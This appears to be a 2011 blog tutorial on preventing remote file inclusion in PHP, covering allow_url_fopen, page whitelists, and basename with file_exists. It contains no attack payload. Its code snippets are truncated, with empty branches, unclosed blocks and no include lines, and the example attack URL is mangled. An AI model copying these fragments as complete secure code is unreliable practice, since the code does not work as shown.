How To: Preventing Remote File Inclusion Exploits with PHP

KeyWords: php, exploit, script, kiddies, remote, file, inclusion, remote file inclusion, basename, file_exists, white list, list, include, require, require_once, include_once, allow_url_fopen, fopen, file_get_contents, prevention, precaution, security, help, howto

For years now I have participated in many coding Forums. Perhaps one of the biggest issues I see is people using $_GET or another unfiltered variable inside of an include, include_once, require or require_once statement. This is a major security risk, and in an attempt to help people stray away from this I have accumulated many different ways this can be done, "properly" (I quote properly because each person has their own preference). Let's get down to the nitty gritty, and see how we can do inclusions in PHP securely without opening ourselves up to being exploited through a remote file inclusion exploit.

First Things First
Most PHP hosts set the allow_url_fopen to be off by default, in an effort to help prevent these exploits. However, not every host does this, and not everyone uses a shared host. If you are on a VPS or Dedicated server, then you may inadvertently enabled this setting or never disabled it. So first things first, go and find your proper php.ini file, and turn this off. If you relied on fopen of remote files or file_get_contents, I would highly suggest switching over to CURL, as it will be much quicker, and allow for security in the event you did not code all the code on your site or using a mainstream item, like WordPress, where it may contain a vulnerability that anyone could see.

Implementing a White List
A common exploitable code that I have seen is basically something in the form of:


If your host has allow_url_fopen enabled, you are just asking to be exploited with a remote file inclusion exploit. Basically, anyone could type in something like: http;//;// and viola, their code remotely executed and basically just opened up your site fully to them. As you can see, this is a huge issue, and is how a lot of malware and virus's get passed around. Implementing a white list will probably be close to one of the sure fire ways this will never happen. The array can come from a number of sources you want it to, hard coded in the file, from a database setting etc. I am just going to write it in line for simplicity reasons.

    $whiteList = array('index' => 'index.php', 'about' => 'about.php', 'contact' => 'contact.php');
if (!empty($_GET['page']) && in_array($_GET['page'], $whiteList)) {
}else {
// default it

As you can see, everything is hard coded, and there is no way for someone to inject their own URL into your site. This would prevent any type of remote file inclusion exploit from being able to be preformed. If you wanted more "security" you could change the names of the files to be something obscured, or include them from a different directory outside of the webroot, so that no one would access them directly. This is generally my preferred method, simply because there is a slim to none chance that you would get remotely exploited.

Using Basename and file_exists
Another method is using the basename and file_exists method. This method I find a bit less secure, given that they can include any file as long as it exists and in the current directory. What the basename does is remove everything but the name of the file. This prevents someone from entering in something like ../../somefile and having that file included, so if your permissions were not setup properly, it could give them access to various stuff, like SSH Keys, logs and other files that you do not want out in the open. The file_exists, make sure that the file exists on the server, this is just an extra precaution. Let's see the code used for this method:

    $file = 'your/path/to/file/' . basename($_GET['page']);
if (file_exists($file)) {
}else {

For this method, I showed you an example of using a path other then the webroot to include the file. This would attempt to prevent people from just probing for different files, and you can place the pages into their own directory, so only pages meant to be included are included. IE, you could have a 'pages' directory and keep them organized in there. If you are using this method, I would highly recommend using the pages directory or similar.

Other Methods
I am sure there are plenty of other methods, I saw one guy using base64, however, this are the two primary methods I recommend to people for their simplicity. My preferred method overall would be the basename with the pages directory, outside of the webroot. This would mask the pages, and make it more difficult to probe for your pages and remove the risk of a file accidentally being included when it should not. If you have other methods, feel free to post them in the comments.

Finishing Touch
This is just one step you can take to secure your site from being exploited by what we call Script Kiddies and the likes of others. This alone, will not completely secure your site so of course you will need to take other precautions on every other aspect of your site. However, if pulling up pages dynamically using a URL intrigues you, this method will help you to secure yourself from being exploited with a remote file inclusion exploit.

As always, I welcome non-trolling or flaming comments. I will remove any flaming or trolling comments, so please leave positive feedback as all that is being done here is attempting to educate users. If you feel I am wrong, tell me in a constructive way with proof and ways to fix it. Thanks, and hopefully this has helped you!

Posted by frost on Jun 15th, 2011 20:29 - Subscribe Bookmark and Share

Post a comment:


Posting as anonymous Anonymous guest, why not register, or login now.




  • Not Implemented